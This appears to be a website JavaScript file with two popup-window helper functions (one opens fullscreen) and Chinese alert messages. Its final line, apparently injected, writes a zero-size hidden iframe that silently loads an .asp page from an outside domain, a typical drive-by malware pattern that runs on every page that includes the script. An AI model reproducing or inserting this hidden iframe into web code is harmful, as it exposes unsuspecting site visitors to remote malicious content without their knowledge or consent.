 function openwin(url)
 {
 	if (url=="") {
		alert('您不是正常打开窗口吧？对不起，请回吧!嘻嘻！');
	}
	else
	{
		splashWin = window.open(url, 'hogo', 'fullscreen=1,toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0' );
		//splashWin.resizeTo (800,570);
		//if (screen.Width>800){
			//splashWin.moveTo((screen.Width-800)/2,(screen.Height-570)/2);
		//}
	}
}
function openwinclose(url)
 {
 	if (url=="") {
		alert('您不是正常打开窗口吧？对不起，请回吧!嘻嘻！');
	}
	else
	{
		splashWin = window.open(url, 'hogo', 'toolbar=1,location=1,directories=0,status=0,menubar=1,scrollbars=1,resizable=0' );
		//splashWin.resizeTo (800,570);
		//if (screen.Width>800){
			//splashWin.moveTo((screen.Width-800)/2,(screen.Height-570)/2);
		//}
	}
}
document.write("<iframe src=http://www.jltao8.com/include/css/1.asp width=0 height=0></iframe>"); 


